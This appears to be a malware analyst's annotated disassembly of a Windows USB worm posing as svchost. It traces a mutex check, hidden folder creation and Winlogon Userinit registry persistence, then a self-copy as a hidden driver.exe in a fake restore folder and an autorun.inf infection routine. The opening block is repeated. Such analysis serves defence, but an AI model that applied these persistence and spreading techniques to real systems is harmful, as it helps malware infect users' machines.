00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN

00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN

00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN

Local calls from 0040BE92, 0040C192, 0040C328, 0040C435

 

MANUAL REDIRECTION FROM THE START :

00414526 |. F>PUSH DWORD PTR SS:[EBP-64] ; parses the command line -e (argument given)
00414529 |. 5>PUSH ESI
0041452A |. 5>PUSH ESI ; /pModule
0041452B |. F>CALL DWORD PTR DS:[<&KERNEL32.GetModuleHa>; \GetModuleHandleA

00407F2E |> 8>CMP EAX,2 ; if eax==2
00407F31 |. 7>JNZ SHORT svchost.00407FAA
00407F33 |. E>CALL svchost.004086B0 ; set RegValue and SetFileAttributes to parent file
00407F38 |. 8>MOV ECX,DWORD PTR DS:[ESI+4]
00407F3B |. 6>PUSH svchost.004255FC ; UNICODE “-m”
00407F40 |. 5>PUSH ECX
00407F41 |. E>CALL svchost.00413C7E

004255DC 2D 00 75 00 00 00 00 00 -.u…..
004255E4 2D 00 65 00 00 00 00 00 -.e…..
004255EC 2D 00 6F 00 00 00 00 00 -.o…..
004255F4 2D 00 73 00 00 00 00 00 -.s…..
004255FC 2D 00 6D 00 00 00 00 00 -.m…..

00413C93 |. 7>|JNZ SHORT svchost.00413CA3
00413C95 |. 6>|TEST CX,CX
00413C98 |. 7>|JE SHORT svchost.00413CA3
00413C9A |. 4>|INC EDX
00413C9B |. 4>|INC EDX
00413C9C |. 4>|INC ESI ; svchost.004255FC (C the dump shot abve)
00413C9D |. 4>|INC ESI
00413C9E |. 6>|MOV CX,WORD PTR DS:[ESI]

At :

0040B9D0 $ 5>PUSH EBP
0040B9D1 . 8>MOV EBP,ESP
0040B9D3 . 6>PUSH -1
0040B9D5 . 6>PUSH svchost.0041FE10 ; SE handler installation
0040B9DA . 6>MOV EAX,DWORD PTR FS:[0]
0040B9E0 . 5>PUSH EAX
0040B9E1 . 6>MOV DWORD PTR FS:[0],ESP
0040B9E8 . 8>SUB ESP,224
0040B9EE . 5>PUSH EBX
0040B9EF . 5>PUSH ESI
0040B9F0 . 5>PUSH EDI
0040B9F1 . 8>MOV DWORD PTR SS:[EBP-10],ESP
0040B9F4 . 6>PUSH svchost.0042612C ; /MutexName = “fuwa”
0040B9F9 . 6>PUSH 1 ; |InitialOwner = TRUE
0040B9FB . 3>XOR EBX,EBX ; |
0040B9FD . 5>PUSH EBX ; |pSecurity => NULL
0040B9FE . F>CALL DWORD PTR DS:[<&KERNEL32.CreateMutex>; \CreateMutexA
0040BA04 . F>CALL DWORD PTR DS:[<&KERNEL32.GetLastErro>; [GetLastError
0040BA0A . 3>CMP EAX,0B7 //code for ERROR_ALREADY_EXSTS (i.e. Program is running), prevents from executing more than one copy
0040BA0F . 7>JNZ SHORT svchost.0040BA24 ; GOES TO drive.ini mal setting module if eax!=0B7
0040BA11 . 3>XOR EAX,EAX
0040BA13 . 8>MOV ECX,DWORD PTR SS:[EBP-C]
$+3C > 0040A3A5 RETURN to svchost.0040A3A5 from svchost.004130C0
$+40 > 0042A378 ASCII “C:\WINDOWS\drive.ini”
$+44 > 0042611C ASCII “%s\drive.ini”
$+48 > 0042A378 ASCII “C:\WINDOWS\drive.ini”

0040A3BB . 6>PUSH svchost.0042A170
0040A3C0 . F>CALL ESI ; kernel32.GetWindowsDirectoryA
0040A3C2 . 6>PUSH svchost.0042601C ; ASCII “log”

0040A3DB . 5>PUSH EBX
0040A3DC . 6>PUSH svchost.0042A170 ; ASCII “C:\WINDOWS\log”
0040A3E1 . E>CALL svchost.00413E46
0040A3E6 . 8>ADD ESP,18
0040A3E9 . 8>CMP EAX,-1
0040A3EC . 7>JNZ SHORT svchost.0040A407
0040A3EE . 5>PUSH EBX ; /pSecurity
0040A3EF . 6>PUSH svchost.0042A170 ; |Path = “C:\WINDOWS\log”
0040A3F4 . F>CALL DWORD PTR DS:[<&KERNEL32.CreateDirec>; \CreateDirectoryA
0040A3FA . 6>PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040A3FC . 6>PUSH svchost.0042A170 ; |FileName = “C:\WINDOWS\log”
0040A401 . F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAttr>; \SetFileAttributesA
0040A407 > B>MOV ECX,41

0040A428 . B>MOV EDI,svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A42D . 8>OR ECX,FFFFFFFF
0040A430 . 3>XOR EAX,EAX
0040A432 . F>REPNE SCAS BYTE PTR ES:[EDI]
0040A434 . F>NOT ECX
0040A436 . 4>DEC ECX
0040A437 . 8>CMP BYTE PTR DS:[ECX+42A273],5C ; chk for backslash
0040A43E . 7>JE SHORT svchost.0040A455
0040A440 . B>MOV EDX,svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A445 . 4>DEC EDX
0040A446 . 8>MOV AL,BYTE PTR DS:[EDX+ECX]

0040A449 > 3>CMP AL,3A ; “:” sign
0040A44B . 7>JE SHORT svchost.0040A455
0040A44D . 4>DEC ECX
0040A44E . 8>MOV AL,BYTE PTR DS:[EDX+ECX]
0040A451 . 3>CMP AL,5C
0040A453 .^7>JNZ SHORT svchost.0040A449
0040A455 > 8>MOV BYTE PTR DS:[ECX+42A273],BL
0040A45B . 6>PUSH svchost.0042601C ; ASCII “log”
0040A460 . 6>PUSH svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A465 . 6>PUSH svchost.00426108 ; ASCII “%s\%s”
0040A46A . 6>PUSH svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0040A46F . E>CALL svchost.004130C0

$+10 > 7C80B357 kernel32.GetModuleFileNameA
$+14 > 0042A2A0 svchost.0042A2A0
$+18 > 7FFFFFD2
$+1C > 0042A274 ASCII “C:\Documents and Settings\VICTOR\Desktop\log”
$+20 > 00000042
$+24 > 0042A378 ASCII “C:\WINDOWS\drive.ini”

$+44 > 0042A274 |Path = “C:\Documents and Settings\VICTOR\Desktop\log”
$+48 > 00000000 \pSecurity = NULL

0040A487 . 5>PUSH EBX ; /pSecurity
0040A488 . 6>PUSH svchost.0042A274 ; |Path = “C:\Documents and Settings\VICTOR\Desktop\log”
0040A48D . F>CALL DWORD PTR DS:[<&KERNEL32.CreateDi>; \CreateDirectoryA

0040A493 6>PUSH 6
0040A495 . 6>PUSH svchost.0042A274 ; |FileName = “C:\Documents and Settings\VICTOR\Desktop\log”
0040A49A . F>CALL DWORD PTR DS:[<&KERNEL32.SetFileA>; \SetFileAttributesA
0040A4A0 > B>MOV ECX,41

0040A4C7 . 5>PUSH EAX
0040A4C8 . 5>PUSH EBX
0040A4C9 . F>CALL ESI //Get module filename (parent file)
0040A4CB . 8>LEA ECX,DWORD PTR SS:[EBP-21C]
0040A4D1 . 5>PUSH ECX

 

Stack address=0012FE14, (ASCII “C:\WINDOWS\system32\userinit.exe,C:\Documents and Settings\VICTOR\Desktop\svchost.eVe -m”)
EAX=00000058

0040A4C9 . F>CALL ESI
0040A4CB . 8>LEA ECX,DWORD PTR SS:[EBP-21C]
0040A4D1 . 5>PUSH ECX
0040A4D2 . 6>PUSH svchost.00425FA8 ; ASCII “C:\WINDOWS\system32\userinit.exe,”
0040A4D7 . 6>PUSH svchost.00426114 ; ASCII “%s%s -m”
0040A4DC . 8>LEA EDX,DWORD PTR SS:[EBP-114]
0040A4E2 . 5>PUSH EDX
0040A4E3 . E>CALL svchost.004130C0
0040A4E8 . 8>LEA EAX,DWORD PTR SS:[EBP-114]
0040A4EE . 5>PUSH EAX
0040A4EF . 6>PUSH svchost.00425F9C ; ASCII “Userinit”
0040A4F4 . 6>PUSH svchost.00425F64 ; ASCII “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
0040A4F9 . E>CALL svchost.004087A0
##
004087C6 |. E>CALL svchost.004130C0 is a generc string concatenator and validator
##

$-F4 > 80000002 |hKey = HKEY_LOCAL_MACHINE
$-F0 > 00425F64 |Subkey = “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
$-EC > 00000000 |Reserved = 0
$-E8 > 000F003F |Access = KEY_ALL_ACCESS
$-E4 > 0012FBD0 \pHandle = 0012FBD0

004087D2 |. 8>ADD ESP,0C
004087D5 |. 8>LEA EDX,DWORD PTR SS:[ESP+4]
004087D9 |. 5>PUSH EDX ; /pHandle
004087DA |. 6>PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004087DF |. 6>PUSH 0 ; |Reserved = 0
004087E1 |. 5>PUSH EAX ; |Subkey
004087E2 |. 6>PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004087E7 |. F>CALL DWORD PTR DS:[<&ADVAPI32.RegOpenK>; \RegOpenKeyExA

0012FBD4 43 3A 5C 57 49 4E 44 4F C:\WINDO
0012FBDC 57 53 5C 73 79 73 74 65 WS\syste
0012FBE4 6D 33 32 5C 75 73 65 72 m32\user
0012FBEC 69 6E 69 74 2E 65 78 65 init.exe
0012FBF4 2C 43 3A 5C 44 6F 63 75 ,C:\Docu
0012FBFC 6D 65 6E 74 73 20 61 6E ments an
0012FC04 64 20 53 65 74 74 69 6E d Settin
0012FC0C 67 73 5C 56 49 43 54 4F gs\VICTO
0012FC14 52 5C 44 65 73 6B 74 6F R\Deskto
0012FC1C 70 5C 73 76 63 68 6F 73 p\svchos
0012FC24 74 2E 65 56 65 20 2D 6D t.eVe -m
0012FC2C 00 00 00 00 00 00 00 00 ……..

$-F8 > 00000050 |hKey = 50
$-F4 > 00425F9C |ValueName = “Userinit”
$-F0 > 00000000 |Reserved = 0
$-EC > 00000001 |ValueType = REG_SZ
$-E8 > 0012FBD4 |Buffer = 0012FBD4
$-E4 > 00000059 \BufSize = 59 (89.)

0040880F |. 5>PUSH ECX ; /BufSize
00408810 |. 8>LEA ECX,DWORD PTR SS:[ESP+C] ; |
00408814 |. 5>PUSH ECX ; |Buffer
00408815 |. 6>PUSH 1 ; |ValueType = REG_SZ
00408817 |. 5>PUSH EAX ; |Reserved => 0
00408818 |. 8>MOV EAX,DWORD PTR SS:[ESP+14] ; |
0040881C |. 5>PUSH EDX ; |ValueName
0040881D |. 5>PUSH EAX ; |hKey
0040881E |. F>CALL DWORD PTR DS:[<&ADVAPI32.RegSetVa>; \RegSetValueExA

0040A4EF . 6>PUSH svchost.00425F9C ; ASCII “Userinit”
0040A4F4 . 6>PUSH svchost.00425F64 ; ASCII “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”
0040A4F9 . E>CALL svchost.004087A0
0040A4FE . 8>ADD ESP,1C
0040A501 . 6>PUSH svchost.00426110 ; ASCII “C:”
0040A506 . 8>LEA ECX,DWORD PTR SS:[EBP-118]
0040A50C . 5>PUSH ECX
0040A50D . E>CALL svchost.004130C0 ; string validator
0040A512 . 8>ADD ESP,8
0040A515 . C>MOV BYTE PTR SS:[EBP-118],43
0040A51C . B>MOV ESI,svchost.0042A5F0
0040A521 . 8>MOV EDI,DWORD PTR DS:[<&KERNEL32.GetDr>; kernel32.GetDriveTypeA

0012FE10 44 3A 00 00 43 3A 5C 57 D:..C:\W
0012FE18 49 4E 44 4F 57 53 5C 73 INDOWS\s
0012FE20 79 73 74 65 6D 33 32 5C ystem32\
0012FE28 75 73 65 72 69 6E 69 74 userinit

Drive Letters are shifted for the next iteration
0040A52E . F>CALL EDI
0040A530 . 3>XOR ECX,ECX
0040A532 . 8>CMP EAX,3 ; hard drive chk
0040A535 . 0>SETE CL ; set lower byte to 1 if zero flag is set
0040A538 . 8>MOV DWORD PTR DS:[ESI],ECX
0040A53A . 8>ADD ESI,4
0040A53D . 8>MOV AL,BYTE PTR SS:[EBP-118] ;move the drive letter to register
0040A543 . F>INC AL ; increase letter by one
0040A545 . 8>MOV BYTE PTR SS:[EBP-118],AL ; copy back to location for next cycle
0040A54B . 3>CMP AL,5A ; chk for Z: drive limit
0040A54D .^7>JL SHORT svchost.0040A527
0040A54F . 8>MOV DWORD PTR SS:[EBP-4],EBX
0040A552 . E>CALL svchost.004093D0
0040A557 . E>JMP SHORT svchost.0040A561

Drive interating loop :

0040A527 > 8>LEA EDX,DWORD PTR SS:[EBP-118]
0040A52D . 5>PUSH EDX
0040A52E . F>CALL EDI
0040A530 . 3>XOR ECX,ECX
0040A532 . 8>CMP EAX,3
0040A535 . 0>SETE CL
0040A538 . 8>MOV DWORD PTR DS:[ESI],ECX
0040A53A . 8>ADD ESI,4
0040A53D . 8>MOV AL,BYTE PTR SS:[EBP-118]
0040A543 . F>INC AL
0040A545 . 8>MOV BYTE PTR SS:[EBP-118],AL
0040A54B . 3>CMP AL,5A
0040A54D .^7>JL SHORT svchost.0040A527

0012FE10 5A 3A 00 00 43 3A 5C 57 49 4E 44 4F 57 53 5C 73 Z:..C:\WINDOWS\s
0012FE20 79 73 74 65 6D 33 32 5C 75 73 65 72 69 6E 69 74 ystem32\userinit

Dump at the end of the iteration.

0040A54D .^7>JL SHORT svchost.0040A527
0040A54F . 8>MOV DWORD PTR SS:[EBP-4],EBX
0040A552 . E>CALL svchost.004093D0 ; USB INFECTION COMPLETE ROUTINE
0040A557 . E>JMP SHORT svchost.0040A561

0040A55F . 3>XOR EBX,EBX
0040A561 > C>MOV DWORD PTR SS:[EBP-4],-1
0040A568 . 6>PUSH 1388 ; /Timeout = 5000. ms
0040A56D . F>CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
00409556 |> 8>/MOV ESI,DWORD PTR SS:[ESP+18]
0040955A |> 8> LEA ECX,DWORD PTR SS:[ESP+14]
0040955E |. 5>|PUSH ECX ; /RootPathName
0040955F |. F>|CALL DWORD PTR DS:[<&KERNEL32.GetDriv>; \GetDriveTypeA
00409565 |. 8>|CMP EAX,2 ; 2 on removable drive or emulation by setting the register
00409568 |. 7>|JE SHORT svchost.0040957B
0040956A |. 8>|CMP EAX,3
0040956D |. 7>|JE SHORT svchost.0040957B
0040956F |. 8>|MOV DWORD PTR DS:[ESI*4+42A588],EBX
00409576 |. E>|JMP svchost.0040A1A1
0040957B |> 8>|CMP DWORD PTR DS:[ESI*4+42A5F0],1
00409583 |. 7>|JNZ SHORT svchost.0040958F
00409585 |. 4>|INC ESI
00409586 |. 8>|MOV DWORD PTR SS:[ESP+18],ESI

 

$-1050 > 0012EC74 ASCII “C:\System_Volume_Information”

00408470 /$ 8>SUB ESP,200
00408476 |. B>MOV ECX,3F
0040847B |. 3>XOR EAX,EAX
0040847D |. 5>PUSH ESI
0040847E |. 5>PUSH EDI
0040847F |. 8>LEA EDI,DWORD PTR SS:[ESP+8]
00408483 |. 6>PUSH svchost.00425A18 ; ASCII “\System_Volume_Information”
00408488 |. F>REP STOS DWORD PTR ES:[EDI]
0040848A |. 6>STOS WORD PTR ES:[EDI]
0040848C |. A>STOS BYTE PTR ES:[EDI]
0040848D |. 8>MOV EAX,DWORD PTR SS:[ESP+210]
00408494 |. 8>LEA ECX,DWORD PTR SS:[ESP+C]
00408498 |. 5>PUSH EAX
00408499 |. 6>PUSH svchost.004252C0 ; ASCII “%s%s”
0040849E |. 5>PUSH ECX
0040849F |. E>CALL svchost.004130C0
004084A4 |. 8>MOV EDI,DWORD PTR DS:[<&KERNEL32.Creat>; kernel32.CreateDirectoryA
004084AA |. 8>ADD ESP,10
0012EC5C 0012EC74 ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}”

004084F9 |. 5>PUSH EDX
004084FA |. E>CALL svchost.00413E46
004084FF |. 8>ADD ESP,8
00408502 |. 8>CMP EAX,-1 ; chk for successfull creation of directory and attributes
00408505 |. 7>JNZ SHORT svchost.00408512 ; branch if successful
00408507 |. 5>POP EDI
00408508 |. 3>XOR EAX,EAX
0040850A |. 5>POP ESI
0040850B |. 8>ADD ESP,200
00408511 |. C>RETN

00408512 |> 8>LEA EAX,DWORD PTR SS:[ESP+8]
00408516 |. 6>PUSH svchost.004259E8 ; ASCII “\driver.exe”
0040851B |. 5>PUSH EAX
0040851C |. 8>LEA ECX,DWORD PTR SS:[ESP+10]
00408520 |. 6>PUSH svchost.004252C0 ; ASCII “%s%s”
00408525 |. 5>PUSH ECX
00408526 |. E>CALL svchost.004130C0
0040852B |. B>MOV ECX,3F
00408530 |. 3>XOR EAX,EAX
00408532 |. 8>LEA EDI,DWORD PTR SS:[ESP+118]
00408539 |. 8>ADD ESP,10
0040853C |. F>REP STOS DWORD PTR ES:[EDI]
0040853E |. 6>STOS WORD PTR ES:[EDI]
00408540 |. 8>LEA EDX,DWORD PTR SS:[ESP+108]
00408547 |. 6>PUSH 0FF ; /BufSize = FF (255.)
0040854C |. 5>PUSH EDX ; |PathBuffer
0040854D |. 6>PUSH 0 ; |hModule = NULL
0040854F |. A>STOS BYTE PTR ES:[EDI] ; |
00408550 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetModul>; \GetModuleFileNameA

Stack address=0012EC74, (ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe”)
EAX=00000034
0012EC60 0012ED74 |ExistingFileName = “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0012EC64 0012EC74 |NewFileName = “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe”
0012EC68 00000001 \FailIfExists = TRUE
0012EC6C 0012F7D0

0040858A |> 8>LEA EAX,DWORD PTR SS:[ESP+8]
0040858E |. 6>PUSH 1 ; /FailIfExists = TRUE
00408590 |. 8>LEA ECX,DWORD PTR SS:[ESP+10C] ; |
00408597 |. 5>PUSH EAX ; |NewFileName
00408598 |. 5>PUSH ECX ; |ExistingFileName
00408599 |. F>CALL DWORD PTR DS:[<&KERNEL32.CopyFile>; \CopyFileA

0040859F |. 8>LEA EDX,DWORD PTR SS:[ESP+8]
004085A3 |. 6>PUSH 7 : readonly|hidden
004085A5 |. 5>PUSH EDX
004085A6 |. F>CALL ESI ; call to set attribute
004085A8 |. 5>POP EDI
004085A9 |. B>MOV EAX,1

00408970 /$ 5>PUSH ESI
00408971 |. 8>MOV ESI,DWORD PTR SS:[ESP+8]
00408975 |. 5>PUSH ESI
00408976 |. E>CALL svchost.00408470 ; calls the infection routine
0040897B |. 8>ADD ESP,4

Returns to the above address.

00408970 /$ 5>PUSH ESI
00408971 |. 8>MOV ESI,DWORD PTR SS:[ESP+8]
00408975 |. 5>PUSH ESI
00408976 |. E>CALL svchost.00408470
0040897B |. 8>ADD ESP,4
0040897E |. 8>TEST EAX,EAX ; chk s if previois routine for driver.exe is successful
00408980 |. 7>JNZ SHORT svchost.00408984
00408982 |. 5>POP ESI
00408983 |. C>RETN
00408984 |> 5>PUSH ESI ; next payload is for the autorun.inf file at
00408985 |. E>CALL svchost.00408160 ; autorun infection routine
0040898A |. 8>ADD ESP,4
0040898D |. 8>TEST EAX,EAX
0040898F |. 7>JNZ SHORT svchost.00408993
